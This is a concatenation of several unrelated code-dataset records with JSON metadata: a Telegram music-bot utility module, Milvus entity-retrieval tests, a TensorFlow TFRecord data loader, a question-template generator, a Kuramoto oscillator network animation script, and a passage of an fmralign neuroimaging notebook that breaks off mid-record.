album[\"genres\"][\"data\"][0][\"name\"]\n except (KeyError, IndexError):\n genre = \"\"\n\n tags = {\n 'artist': track[\"artist\"][\"name\"],\n 'album': track[\"album\"][\"title\"],\n 'album_artist': album[\"artist\"][\"name\"],\n 'original_release_date': track[\"album\"][\"release_date\"],\n 'recording_date': int(track[\"album\"][\"release_date\"].split(\"-\")[0]),\n 'title': track[\"title\"],\n 'track_num': track[\"track_position\"],\n 'disc_num': track[\"disk_number\"],\n 'non_std_genre': genre,\n 'bpm': track[\"bpm\"]\n }\n if path.endswith('mp3'):\n add_mp3_tags(path, tags, image, lyrics, image_mimetype='image/jpg')\n elif path.endswith('flac'):\n add_flac_tags(path, tags, image, lyrics, image_mimetype='image/jpg')\n\n\ndef sc_add_tags(path, track, image, lyrics=None):\n try:\n album_title = track[\"publisher_metadata\"][\"album_title\"]\n except 
KeyError:\n album_title = \"\"\n\n tags = {\n 'title': track.title,\n 'artist': track.artist,\n 'album': album_title,\n 'album_artist': track.artist if album_title else \"\",\n 'album_title': album_title,\n 'original_release_date': (\n track.created_at.split(\"T\")[0].split(\" \")[0].replace(\"/\", \"-\")),\n 'non_std_genre': track.get(\"genre\", \"\"),\n }\n add_mp3_tags(path, tags, image, lyrics)\n\n\ndef vk_add_tags(path, track, image=None):\n tags = {\n 'title': track.title,\n 'artist': track.artist,\n }\n if track.album:\n tags.update({'album': track.album.title})\n add_mp3_tags(path, tags, image, image_mimetype='image/jpg')\n\n\ndef add_mp3_tags(path, tags, image, lyrics=None, image_mimetype='image/png'):\n tag = Tag()\n tag.parse(path)\n for key, val in tags.items():\n try:\n setattr(tag, key, val)\n except Exception as e:\n print(e)\n if lyrics:\n tag.lyrics.set(lyrics)\n if image:\n tag.images.set(type_=3, img_data=image, mime_type=image_mimetype)\n tag.save(encoding='utf-8')\n\n\ndef add_flac_tags(path, tags, image, lyrics=None, image_mimetype='image/jpg'):\n tag = FLAC(path)\n pic = Picture()\n pic.data = image\n pic.type = 3\n pic.mime = image_mimetype\n tag.add_picture(pic)\n for key, val in tags.items():\n try:\n tag[key] = str(val)\n except Exception as e:\n print(e)\n tag.save()\n\n\nerrcount = {\"count\": 0}\n\n\nasync def request_get(url, params=None, json=None, *args, **kwargs):\n retries_count = 0\n while True:\n try:\n result = await var.session.get(\n url, params=params, json=json, *args, **kwargs)\n except TimeoutError:\n if errcount[\"count\"] > 3:\n exit(1)\n await var.session.close()\n var.session = aiohttp.ClientSession(raise_for_status=True)\n errcount[\"count\"] += 1\n except Exception as err:\n retries_count += 1\n if retries_count > 3:\n print(\n f'url=\\n{url}\\nparams={params}\\n'\n f'args={args}\\nkwargs={kwargs}')\n print_traceback(err)\n raise ValueError(\"Number of retries exceeded\") from err\n else:\n return result\n\n\nasync def request_post(url, *args, **kwargs):\n retries_count = 0\n while True:\n try:\n result = await var.session.post(url, *args, **kwargs)\n except TimeoutError:\n if errcount[\"count\"] > 3:\n exit(1)\n await var.session.close()\n var.session = aiohttp.ClientSession()\n errcount[\"count\"] += 1\n except Exception as err:\n retries_count += 1\n if retries_count > 3:\n print(\n f'url=\\n{url}\\nargs={args}\\nkwargs={kwargs}')\n raise ValueError(\"Number of retries exceeded\") from err\n else:\n return result\n\n\n@calling_queue(3)\nasync def upload_track(bot, path, title, performer, duration=None, tries=0):\n if tries > 3:\n raise RuntimeError(\"can't upload track\")\n try:\n msg = await bot.send_audio(\n chat_id=-1001246220493,\n audio=types.InputFile(path),\n title=title,\n performer=performer,\n duration=duration,\n )\n except exceptions.RetryAfter as e:\n print(f\"flood control exceeded, sleeping for {e.timeout + 10} seconds\")\n await sleep(e.timeout + 10)\n return await upload_track(\n bot, path, title, performer, duration, tries + 1)\n except exceptions.TelegramAPIError:\n await sleep(5)\n return await upload_track(\n bot, path, title, performer, duration, tries + 1)\n return msg\n\n\n# async def launch_with_timeout(size):\n# def wrapper(coro, timeout, on_error=\"raise\"):\n# @wraps(coro)\n# async def decorator(*args, **kwargs):\n# task = asyncio.create_task(coro)\n# try:\n# result = await asyncio.wait_for(task, timeout)\n# return result\n# except TimeoutError as exc:\n# if on_error == \"raise\":\n# raise\n# elif on_error == 
\"print\":\n# print_traceback(exc)\n\n# return decorator\n\n# return wrapper\n\n\nasync def answer_empty_inline_query(query: types.InlineQuery, text: str):\n if not text:\n return await query.answer(\n results=[],\n switch_pm_text='Search',\n switch_pm_parameter='0')\n elif query.offset == 'done':\n return await query.answer(results=[])\n else:\n return False\n return True\n\n\nasync def delete_later(path: str, delay: int = 100):\n await asyncio.sleep(delay)\n with suppress(FileNotFoundError):\n shutil.rmtree(path.rsplit('/', 1)[0])\n", "sub_path": "utils.py", "file_name": "utils.py", "file_ext": "py", "file_size_in_byte": 10067, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "config.request_sign", "line_number": 27, "usage_type": "attribute"}, {"api_name": "hashlib.sha256", "line_number": 28, "usage_type": "call"}, {"api_name": "config.request_sign", "line_number": 33, "usage_type": "attribute"}, {"api_name": "traceback.format_tb", "line_number": 37, "usage_type": "call"}, {"api_name": "aiogram.exceptions.InvalidQueryID", "line_number": 43, "usage_type": "attribute"}, {"api_name": "aiogram.exceptions", "line_number": 43, "usage_type": "name"}, {"api_name": "random.sample", "line_number": 56, "usage_type": "call"}, {"api_name": "string.ascii_letters", "line_number": 56, "usage_type": "attribute"}, {"api_name": "var.var.downloading.get", "line_number": 84, "usage_type": "call"}, {"api_name": "var.var.downloading", "line_number": 84, "usage_type": "attribute"}, {"api_name": "var.var", "line_number": 84, "usage_type": "name"}, {"api_name": "time.time", "line_number": 85, "usage_type": "call"}, {"api_name": "config.admins", "line_number": 91, "usage_type": "attribute"}, {"api_name": "config.donated_users", "line_number": 91, "usage_type": "attribute"}, {"api_name": "collections.namedtuple", "line_number": 98, "usage_type": "call"}, {"api_name": "datetime.date.today", "line_number": 103, "usage_type": "call"}, {"api_name": "datetime.date", "line_number": 103, "usage_type": "name"}, {"api_name": "glob.iglob", "line_number": 107, "usage_type": "call"}, {"api_name": "glob.iglob", "line_number": 109, "usage_type": "call"}, {"api_name": "glob.iglob", "line_number": 111, "usage_type": "call"}, {"api_name": "yarl.URL", "line_number": 122, "usage_type": "call"}, {"api_name": "asyncio.Semaphore", "line_number": 128, "usage_type": "call"}, {"api_name": "asyncio.wait_for", "line_number": 134, "usage_type": "call"}, {"api_name": "asyncio.TimeoutError", "line_number": 135, "usage_type": "name"}, {"api_name": "functools.wraps", "line_number": 130, "usage_type": "call"}, {"api_name": "aiofiles.open", "line_number": 147, "usage_type": "call"}, {"api_name": "eyed3.id3.Tag", "line_number": 217, "usage_type": "call"}, {"api_name": "mutagen.flac.FLAC", "line_number": 232, "usage_type": "call"}, {"api_name": "mutagen.flac.Picture", "line_number": 233, "usage_type": "call"}, {"api_name": "var.var.session.get", "line_number": 253, "usage_type": "call"}, {"api_name": "var.var.session", "line_number": 253, "usage_type": "attribute"}, {"api_name": "var.var", "line_number": 253, "usage_type": "name"}, {"api_name": "asyncio.TimeoutError", "line_number": 255, "usage_type": "name"}, {"api_name": "var.var.session.close", "line_number": 258, "usage_type": "call"}, {"api_name": "var.var.session", "line_number": 258, "usage_type": "attribute"}, {"api_name": "var.var", "line_number": 258, "usage_type": "name"}, {"api_name": "var.var.session", 
"line_number": 259, "usage_type": "attribute"}, {"api_name": "var.var", "line_number": 259, "usage_type": "name"}, {"api_name": "aiohttp.ClientSession", "line_number": 259, "usage_type": "call"}, {"api_name": "var.var.session.post", "line_number": 277, "usage_type": "call"}, {"api_name": "var.var.session", "line_number": 277, "usage_type": "attribute"}, {"api_name": "var.var", "line_number": 277, "usage_type": "name"}, {"api_name": "asyncio.TimeoutError", "line_number": 278, "usage_type": "name"}, {"api_name": "var.var.session.close", "line_number": 281, "usage_type": "call"}, {"api_name": "var.var.session", "line_number": 281, "usage_type": "attribute"}, {"api_name": "var.var", "line_number": 281, "usage_type": "name"}, {"api_name": "var.var.session", "line_number": 282, "usage_type": "attribute"}, {"api_name": "var.var", "line_number": 282, "usage_type": "name"}, {"api_name": "aiohttp.ClientSession", "line_number": 282, "usage_type": "call"}, {"api_name": "aiogram.types.InputFile", "line_number": 301, "usage_type": "call"}, {"api_name": "aiogram.types", "line_number": 301, "usage_type": "name"}, {"api_name": "aiogram.exceptions.RetryAfter", "line_number": 306, "usage_type": "attribute"}, {"api_name": "aiogram.exceptions", "line_number": 306, "usage_type": "name"}, {"api_name": "asyncio.sleep", "line_number": 308, "usage_type": "call"}, {"api_name": "aiogram.exceptions.TelegramAPIError", "line_number": 311, "usage_type": "attribute"}, {"api_name": "aiogram.exceptions", "line_number": 311, "usage_type": "name"}, {"api_name": "asyncio.sleep", "line_number": 312, "usage_type": "call"}, {"api_name": "aiogram.types.InlineQuery", "line_number": 337, "usage_type": "attribute"}, {"api_name": "aiogram.types", "line_number": 337, "usage_type": "name"}, {"api_name": "asyncio.sleep", "line_number": 351, "usage_type": "call"}, {"api_name": "contextlib.suppress", "line_number": 352, "usage_type": "call"}, {"api_name": "shutil.rmtree", "line_number": 353, "usage_type": "call"}]} +{"seq_id": "124041869", "text": "import logging\nimport time\nimport pdb\nimport copy\nimport threading\nfrom multiprocessing import Pool, Process\nimport pytest\nfrom utils import *\nfrom constants import *\n\nGET_TIMEOUT = 120\nuid = \"test_get\"\n\n\nclass TestGetBase:\n \"\"\"\n ******************************************************************\n The following cases are used to test `insert` function\n ******************************************************************\n \"\"\"\n\n @pytest.fixture(\n scope=\"function\",\n params=gen_simple_index()\n )\n def get_simple_index(self, request, client):\n if str(client.system_cmd(\"mode\")) == \"CPU\":\n if request.param[\"index_type\"] in index_cpu_not_support():\n pytest.skip(\"CPU not support index_type: ivf_sq8h\")\n return request.param\n\n @pytest.fixture(\n scope=\"function\",\n params=gen_single_filter_fields()\n )\n def get_filter_field(self, request):\n yield request.param\n\n @pytest.fixture(\n scope=\"function\",\n params=gen_single_vector_fields()\n )\n def get_vector_field(self, request):\n yield request.param\n\n def test_get_entity_id_not_exised(self, client, collection):\n '''\n target: test delete entity, params entity_id not existed\n method: add entity and delete\n expected: entities empty\n '''\n ids = client.insert(collection, default_entity)\n client.flush([collection])\n entities = client.get_entities(collection, [0,1])\n assert entities\n\n def test_get_empty_collection(self, client, collection):\n '''\n target: test hry entity, params collection_name not 
def test_get_empty_collection(self, client, collection):\n        '''\n        target: test get entity from an empty collection\n        method: get entity ids without inserting any data\n        expected: request succeeds\n        '''\n        entities = client.get_entities(collection, [0])\n        assert entities\n\n    def test_get_entity_collection_not_existed(self, client, collection):\n        '''\n        target: test get entity, params collection_name not existed\n        method: get entities from a non-existent collection\n        expected: no entities returned\n        '''\n        collection_new = gen_unique_str()\n        entities = client.get_entities(collection_new, [0])\n        assert not entities\n\n    def test_insert_get(self, client, collection):\n        '''\n        target: test get entity\n        method: add entities and get one of them by id\n        expected: one entity returned\n        '''\n        ids = client.insert(collection, default_entities)\n        client.flush([collection])\n        get_ids = [ids[0]]\n        entities = client.get_entities(collection, get_ids)\n        assert len(entities) == 1\n\n    def test_insert_get_batch(self, client, collection):\n        '''\n        target: test get entity\n        method: add entities and get a batch of them by id\n        expected: all requested entities returned\n        '''\n        get_length = 10\n        ids = client.insert(collection, default_entities)\n        client.flush([collection])\n        get_ids = ids[:get_length]\n        entities = client.get_entities(collection, get_ids)\n        assert len(entities) == get_length", "sub_path": "tests/milvus_http_test/entities/test_get.py", "file_name": "test_get.py", "file_ext": "py", "file_size_in_byte": 3036, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "pytest.skip", "line_number": 29, "usage_type": "call"}, {"api_name": "pytest.fixture", "line_number": 22, "usage_type": "call"}, {"api_name": "pytest.fixture", "line_number": 32, "usage_type": "call"}, {"api_name": "pytest.fixture", "line_number": 39, "usage_type": "call"}]} +{"seq_id": "105329083", "text": "import math\nfrom functools import partial\nimport tensorflow as tf\nfrom utils import HyperParams\n\n\nclass DataLoader(HyperParams):\n    \"\"\"\n    Class that parses TFRecords and builds a tf.data.Dataset\n    \"\"\"\n\n    autotune = tf.data.experimental.AUTOTUNE\n\n    def __init__(self, tfr_path, img_size):\n        self.tfr_path = tfr_path\n        self.img_size = img_size\n\n    def _parse_function(self, tfrecord_serialized, size):\n        \"\"\"\n        See the official TensorFlow documentation\n        \"\"\"\n        features = {\n            \"image\": tf.io.FixedLenFeature([], tf.string),\n            \"label\": tf.io.FixedLenFeature([], tf.int64),\n        }\n        parsed_features = tf.io.parse_single_example(tfrecord_serialized, features)\n\n        image = tf.io.decode_raw(parsed_features[\"image\"], tf.uint8)\n        image = tf.reshape(image, [256, 256, 3])\n        image = tf.image.resize(image, [size, size])\n\n        label = tf.cast(parsed_features[\"label\"], tf.int64)\n        label = tf.one_hot(label, 10)\n\n        return image, label\n\n    def build_dataset(self):\n        \"\"\"\n        Dataset build function\n        \"\"\"\n        # load the dataset\n        dataset = tf.data.TFRecordDataset(self.tfr_path)\n        # define the dataset sizes\n        dataset_size = len(list(dataset))\n        train_size = int(self.train_size * dataset_size)\n        val_size = int((1 - self.train_size) * dataset_size)\n        # data parsing and shuffle\n        dataset = dataset.map(\n            partial(self._parse_function, size=self.img_size),\n            num_parallel_calls=self.autotune,\n        )\n        dataset = dataset.shuffle(dataset_size)\n        # trainset build\n        train_ds = dataset.take(train_size)\n        train_ds = train_ds.batch(self.batch_size)\n        train_ds = train_ds.repeat().prefetch(self.autotune)\n        # validationset build\n        val_ds = dataset.skip(train_size)\n        val_ds = val_ds.take(val_size)\n        val_ds = val_ds.batch(self.batch_size)\n\n        steps = math.floor(dataset_size / self.batch_size)\n\n        return train_ds, val_ds, steps\n", "sub_path": 
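A short usage sketch for the DataLoader above; the TFRecord path, image size, and the train_size/batch_size values normally supplied by HyperParams are all assumptions for illustration:

# assumes HyperParams provides train_size (e.g. 0.8) and batch_size (e.g. 32)
loader = DataLoader(tfr_path='data/images.tfrecord', img_size=224)  # hypothetical path
train_ds, val_ds, steps = loader.build_dataset()

for images, labels in train_ds.take(1):
    print(images.shape)  # (batch_size, 224, 224, 3)
    print(labels.shape)  # (batch_size, 10) -- one-hot labels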
"image_classifier/dataloader.py", "file_name": "dataloader.py", "file_ext": "py", "file_size_in_byte": 2056, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "utils.HyperParams", "line_number": 7, "usage_type": "name"}, {"api_name": "tensorflow.data", "line_number": 12, "usage_type": "attribute"}, {"api_name": "tensorflow.io.FixedLenFeature", "line_number": 23, "usage_type": "call"}, {"api_name": "tensorflow.io", "line_number": 23, "usage_type": "attribute"}, {"api_name": "tensorflow.string", "line_number": 23, "usage_type": "attribute"}, {"api_name": "tensorflow.io.FixedLenFeature", "line_number": 24, "usage_type": "call"}, {"api_name": "tensorflow.io", "line_number": 24, "usage_type": "attribute"}, {"api_name": "tensorflow.int64", "line_number": 24, "usage_type": "attribute"}, {"api_name": "tensorflow.io.parse_single_example", "line_number": 26, "usage_type": "call"}, {"api_name": "tensorflow.io", "line_number": 26, "usage_type": "attribute"}, {"api_name": "tensorflow.io.decode_raw", "line_number": 28, "usage_type": "call"}, {"api_name": "tensorflow.io", "line_number": 28, "usage_type": "attribute"}, {"api_name": "tensorflow.uint8", "line_number": 28, "usage_type": "attribute"}, {"api_name": "tensorflow.reshape", "line_number": 29, "usage_type": "call"}, {"api_name": "tensorflow.image.resize", "line_number": 30, "usage_type": "call"}, {"api_name": "tensorflow.image", "line_number": 30, "usage_type": "attribute"}, {"api_name": "tensorflow.cast", "line_number": 32, "usage_type": "call"}, {"api_name": "tensorflow.int64", "line_number": 32, "usage_type": "attribute"}, {"api_name": "tensorflow.one_hot", "line_number": 33, "usage_type": "call"}, {"api_name": "tensorflow.data.TFRecordDataset", "line_number": 42, "usage_type": "call"}, {"api_name": "tensorflow.data", "line_number": 42, "usage_type": "attribute"}, {"api_name": "functools.partial", "line_number": 49, "usage_type": "call"}, {"api_name": "math.floor", "line_number": 62, "usage_type": "call"}]} +{"seq_id": "595410678", "text": "import sys\nimport simplejson as json\nimport random\n\n\ndef _read_templates(fn):\n if not fn.is_file():\n print(\"[file error]\", fn, \"is not found.\")\n sys.exit()\n f = fn.open(\"r\")\n jsonData = json.load(f)\n f.close()\n\n return jsonData\n\n\ndef no_premise_q_generator(sbody, fn_templates):\n templates = _read_templates(fn=fn_templates)\n r_msg = \"\"\n r_msg += random.choice(templates[\"cushions\"])\n r_msg += random.choice(templates[\"templates\"])\n r_msg += \"\\n\"\n return r_msg + sbody\n", "sub_path": "src/question_generator/q_no_premise.py", "file_name": "q_no_premise.py", "file_ext": "py", "file_size_in_byte": 516, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "sys.exit", "line_number": 9, "usage_type": "call"}, {"api_name": "simplejson.load", "line_number": 11, "usage_type": "call"}, {"api_name": "random.choice", "line_number": 20, "usage_type": "call"}, {"api_name": "random.choice", "line_number": 21, "usage_type": "call"}]} +{"seq_id": "99486966", "text": "# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Jun 27 09:36:05 2019\n\n@author: embog\n\"\"\"\n\nimport numpy as np\nimport networkx as nx\nimport matplotlib.pyplot as plt\nfrom scipy.integrate import solve_ivp\nimport scipy.integrate as inte\nfrom matplotlib.colors import LinearSegmentedColormap\n\n'''\nfrom pylab import rcParams\nplt.rc('text', usetex=True)\nplt.rc('font', 
family='serif')\nplt.rc('font', serif='Palatino')\n'''\n\n\n# so that the plots render better in jupyter\n#get_ipython().run_line_magic('config', \"InlineBackend.figure_format = 'svg'\")\n\n# following lines taken from: https://github.com/cbnfreitas/kuramoto_model_integrate_and_plot\ndef chop_colormap(cmap, minval=0.0, maxval=1.0, n=100):\n    new_cmap = LinearSegmentedColormap.from_list(\n        'trunc({n},{a:.2f},{b:.2f})'.format(n=cmap.name, a=minval, b=maxval),\n        cmap(np.linspace(minval, maxval, n)))\n    return new_cmap\n\n#This cmap is applied to node coloring\n#cmap_aux = LinearSegmentedColormap.from_list(\"\", [\"cyan\",\"#580058\"])\n#see https://stackoverflow.com/questions/22408237/named-colors-in-matplotlib for colors\ncmap_aux = LinearSegmentedColormap.from_list(\"\", [\"red\",\"yellow\"])\n\n#In gray scale, cyan becomes almost white, this is why we chop the beginning of the color map\ncyan_purple_cmap = chop_colormap(cmap_aux, 0.00, 1)\nccmap_aux = LinearSegmentedColormap.from_list(\"\", [\"darkred\",\"red\",\"yellow\",\"red\",\"darkred\"])\n'''\nviridis = plt.cm.get_cmap('viridis', 12)\nccmap_aux = LinearSegmentedColormap.from_list(\"\", [viridis(.01),viridis(.1),viridis(.2),\n                                    viridis(.3),viridis(.4),viridis(.5),\n                                    viridis(.6),viridis(.7),viridis(.8),viridis(0.9),viridis(.99),\n                                    viridis(.9),viridis(.8),viridis(.7),\n                                    viridis(.6),viridis(.5),viridis(.4),\n                                    viridis(.3),viridis(.2),viridis(.1),\n                                    viridis(.01),])\n'''\npsi_purple_cmap = chop_colormap(ccmap_aux, 0.00, 1)\n\ndef frequency_to_color(w):\n    colors_cyan_purple = cyan_purple_cmap(np.linspace(0, 1, 1001))\n    w_min = min(w)\n    w_max = max(w)\n    return [colors_cyan_purple[int(1000*(w[i] - w_min)/(w_max - w_min))] for i in range(len(w))]\n\ndef angle_to_color(w):\n    colors_cyan_purple = psi_purple_cmap(np.linspace(0, 1, 1001))\n    w_min = min(w)\n    w_max = max(w)\n    return [colors_cyan_purple[int(1000*(w[i] - w_min)/(w_max - w_min))] for i in range(len(w))]\n\n\n# I like these colors better for the plots\ndef colores_tableau():\n    # Sources: http://www.randalolson.com/2014/06/28/how-to-make\n    # -beautiful-data-visualizations-in-python-with-matplotlib/\n    # These are the \"Tableau 20\" colors as RGB.\n    tableau20=[(31, 119, 180), (174, 199, 232), (255, 127, 14), (255, 187, 120),\n               (44, 160, 44), (152, 223, 138), (214, 39, 40), (255, 152, 150),\n               (148, 103, 189), (197, 176, 213), (140, 86, 75), (196, 156, 148),\n               (227, 119, 194), (247, 182, 210), (127, 127, 127), (199, 199, 199),\n               (188, 189, 34), (219, 219, 141), (23, 190, 207), (158, 218, 229)]\n    # Scale the RGB values to the [0, 1] range, which is the format matplotlib\n    # accepts.\n    for i in range(len(tableau20)):\n        red, green, blue = tableau20[i]\n        tableau20[i] = (red / 255., green / 255., blue / 255.)
\n    return tableau20\n\ntableau20 = colores_tableau()\n\nfilename_in = \"../data/FG_N=500_m=1_4_a=5_sig=0.08_EDGELIST_1.txt\"\ndatos = (np.genfromtxt(filename_in,skip_header=0))\nxdat=datos[:,1]\nydat=datos[:,2]\ne1 = [int(xdat[i]) for i in range(0,len(xdat))]\ne2 = [int(ydat[i]) for i in range(0,len(ydat))]\nmy_edge_list = [[e1[i],e2[i],datos[i,0]] for i in range(0,len(e1))]\nmy_edge_list = np.array(my_edge_list, dtype=int)\nI1 = np.max(my_edge_list[:,0])\nI2 = np.max(my_edge_list[:,1])\nNODE_NR = np.max([I1,I2])+1\nNODE_NR\n\n\n# In[19]:\n\n\ndata = np.genfromtxt(\"../pattern.txt\")\ndata = np.transpose(data)\nlist_dat = list(data)\nt = list_dat.pop(0)\ndelta_t_trash = list_dat.pop(0)\nasd = np.array(list_dat)\nt = [int(t[i]) for i in range(len(t))]\n\nnr_e_ini = np.min(t)\nnr_e_fin = np.max(t)\nnr_e_ini\n \n\n\n# In[64]:\n\n\ng_aux = nx.Graph()\nfor i in range(0,NODE_NR):\n    g_aux.add_node(i)\nfor i in range(0,len(my_edge_list)):\n    g_aux.add_edge(my_edge_list[i][0],my_edge_list[i][1])\n\ng_aux.add_edge(0,432)\n \n#connctd = sorted(nx.connected_components(g_aux), key=len, reverse=True)\n#connctd = [np.array((list(i)),dtype=int) for i in connctd]\n \nfig = plt.figure(figsize=(11,9))\nPOS_FINAL = nx.spring_layout(g_aux, iterations=40)\nnx.draw(g_aux, pos=POS_FINAL, node_size=40,\n        edge_color = 'black',\n        with_labels=False, font_size=10, font_color='white')\n\n\n# Now let's animate.\n\n# In[65]:\n\n\nimport matplotlib.animation as animation\nfrom IPython.core.display import display, HTML\ndisplay(HTML('
Animation attempt.
'))\n\n\nimport matplotlib.animation as animation\n\n#%pylab qt\n \n\nplt.rcParams['animation.ffmpeg_path'] = 'c://ffmpeg-4.1.1-win64-static//bin//ffmpeg.exe'\nfig = plt.figure(figsize=(11,9))\n#param, = plt.plot(t,y_t[1])\nang_2pi = np.linspace(0,2*np.pi,num=1000)\n#colors_w = frequency_to_color(w)\n\n\ndef update_argand(i):\n fig.clf()\n \n \n for node in range(0,NODE_NR):\n plt.scatter(np.cos(asd[node][i]),np.sin(asd[node][i]),facecolor=colors_w[node], # color='b',\n marker='o', linewidth=0.5, zorder=3, edgecolor='gray', s = 100)\n \n plt.scatter(r[i]*np.cos(psi[i]),r[i]*np.sin(psi[i]), color='b',\n linewidth = 3, zorder=2)\n plt.plot(r[:i]*np.cos(psi[:i]),r[:i]*np.sin(psi[:i]), color='b', linewidth = 1.0, zorder=1)\n \n plt.plot(np.cos(ang_2pi),np.sin(ang_2pi), color='gray')\n \n plt.xlim([-1.1,1.1])\n plt.ylim([-1.1,1.1])\n \n sm = plt.cm.ScalarMappable(cmap=cyan_purple_cmap, norm=plt.Normalize(vmin=min(w), vmax=max(w)))\n sm._A = []\n cb1 = plt.colorbar(sm)\n cb1.set_label(r'$\\omega_i$')\n \n return fig,\n\ng = nx.Graph()\nfor i in range(0,NODE_NR):\n g.add_node(i)\n\ni = 0\nwhile (i Aly M, Chen J, Turk-Browne NB, & Hasson U (2018). Learning naturalistic temporal structure in the posterior medial network. _Journal of Cognitive Neuroscience_ , 30(9): 1345-1365.\n#\n# Participants were shown clips from the film _Grand Budapest Hotel_ in either a fixed or temporally scrambled order. Of those clips shown temporally scrambled, the scrambling could either be consistent or inconsistent across runs. These three conditions were presented over three runs, and are depicted graphically in the following figure.\n#\n# \n#\n# _Figure 1._ Experimental design. Figure reproduced from Aly et al (2018).\n\n# %% [markdown]\n# Data were downloaded from OpenNeuro and pre-processed with [fMRIPrep](http://fmriprep.readthedocs.io) [1.5.0-rc1](https://github.com/poldracklab/fmriprep/releases/tag/1.5.0rc1) using a generated Singularity image deployed on Compute Canada infrastructure.\n# Specifically, the following flags were provided:\n#\n# ```\n# singularity run -B ${DATADIR}:/data:ro \\\n# -B ${OUTDIR}:/out \\\n# -B ${SIMGDIR}/license.txt:/license/license.txt:ro \\\n# ${SIMGDIR}/fmriprep-1.5.0rc1.simg \\\n# /data /out participant \\\n# --participant-label sub-${sub} \\\n# --output-space fsaverage5 template \\\n# -w /out/workdir \\\n# --notrack \\\n# --fs-license-file /license/license.txt\n# ```\n#\n# Generated reports were visually inspected for functional-anatomical coregistration.\n# Importantly, these data were originally collected for a study that focused on the long-axis of the hippocampus.\n# Therefore, the selected field-of-view excludes large portions of prefrontal cortex and cerebellum.\n# An example visual report output is as shown below:\n#\n# \n#\n# _Figure 2._ An example visual report generated by fMRIPrep for ds1545.\n\n# %% [markdown]\n# ## Accessing the dataset and selecting a region-of-interest\n#\n# First, we'll need to download the preprocessed data.\n# This data is [currently hosted](https://osf.io/vgj7w/) on the Open Science Framework (OSF), and we can access it using a simple [Nilearn-style](https://nilearn.github.io) fetcher.\n\n# %%\nfrom fetch_data import fetch_mtl_fmri\n\n# Here, we're using the nickname MTL for the Medial Temporal Lobe,\n# since the original publication with ds1545 focused on this region\nmtl = fetch_mtl_fmri(n_subjects=2, n_runs=2)\n\n# %% [markdown]\n# Given the limited field-of-view, in this notebook we will focus our investigations on regions of interest (ROIs) 
within the ventral visual stream.\n# We can select an ROI previously defined by Haxby and colleagues (2001) in the ventral temporal cortex.\n# We'll access this ROI with Nilearn.\n\n# %%\nfrom nilearn import (datasets, image, plotting)\n\natlas_schaefer_2018 = datasets.fetch_atlas_schaefer_2018(\n    n_rois=800, yeo_networks=17, resolution_mm=2)\natlas = image.load_img(atlas_schaefer_2018.maps)\nmask = image.new_img_like(atlas, atlas.get_data() == 5)\nresampled_mask = image.resample_to_img(\n    mask, image.mean_img(mtl.func[0]), interpolation=\"nearest\")\n\n# %%\n# %matplotlib inline\nfrom nilearn.input_data import NiftiMasker\n\nroi_masker = NiftiMasker(mask_img=resampled_mask).fit()\nroi_masker.generate_report()\n\n# %% [markdown]\n# ## Defining and running the alignment\n#\n# We'll need to define our `source` and `target` datasets for alignment.\n# Since we'd like to learn about the relative accuracy of the different methods being compared,\n# we'll also define a `train` and `test` loop.\n#\n# To keep our investigations computationally tractable, we'll only use the first ten volumes for each image,\n# indexed using Nilearn's `index_img` function.\n\n# %%\nimport fmralign\n\nfiles = []\nkeys = ['source_train', 'target_train', 'source_test', 'target_test']\n\nfor i, k in enumerate(keys):\n    files.append(image.index_img(mtl.func[i], index=slice(0,10)))\n    \ndata = dict(zip(keys, files))\n\n# %% [markdown]\n# Alignment is performed in local neighborhoods, so we'll first parcellate our functional scans using [ReNA clustering](https://arxiv.org/abs/1609.04608).\n# Because we don't want our parcels to be overly large (as this would significantly increase the computational cost), we'll explicitly set the number of parcels.\n# In this case, we'll set the number of parcels such that each contains approximately 200 voxels.\n\n# %%\nimport warnings\nwarnings.simplefilter(action='ignore', category=(DeprecationWarning,\n                                                 FutureWarning,\n                                                 UserWarning))\n\nfrom fmralign.pairwise_alignment import PairwiseAlignment\nfrom fmralign._utils import voxelwise_correlation\nmethods = ['identity', 'scaled_orthogonal', 'ridge_cv']\n\nfor method in methods:\n    alignment_estimator = PairwiseAlignment(alignment_method=method, n_pieces=1,\n                                            clustering='rena', mask=roi_masker)\n    alignment_estimator.fit(data['source_train'], data['target_train'])\n    target_pred = alignment_estimator.transform(data['source_test'])\n    # calculate and display the performance of the alignment estimator\n    aligned_score = voxelwise_correlation(data['target_test'], target_pred, roi_masker)\n    display = plotting.plot_stat_map(aligned_score,\n                                     title=f\"Correlation of prediction after {method} alignment\")\n\n# %%\n", "sub_path": "mtl_benchmark.py", "file_name": "mtl_benchmark.py", "file_ext": "py", "file_size_in_byte": 6274, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "fetch_data.fetch_mtl_fmri", "line_number": 67, "usage_type": "call"}, {"api_name": "nilearn.datasets.fetch_atlas_schaefer_2018", "line_number": 77, "usage_type": "call"}, {"api_name": "nilearn.datasets", "line_number": 77, "usage_type": "name"}, {"api_name": "nilearn.image.load_img", "line_number": 79, "usage_type": "call"}, {"api_name": "nilearn.image", "line_number": 79, "usage_type": "name"}, {"api_name": "nilearn.image.new_img_like", "line_number": 80, "usage_type": "call"}, {"api_name": "nilearn.image", "line_number": 80, "usage_type": "name"}, {"api_name": "nilearn.image.resample_to_img", "line_number": 81,
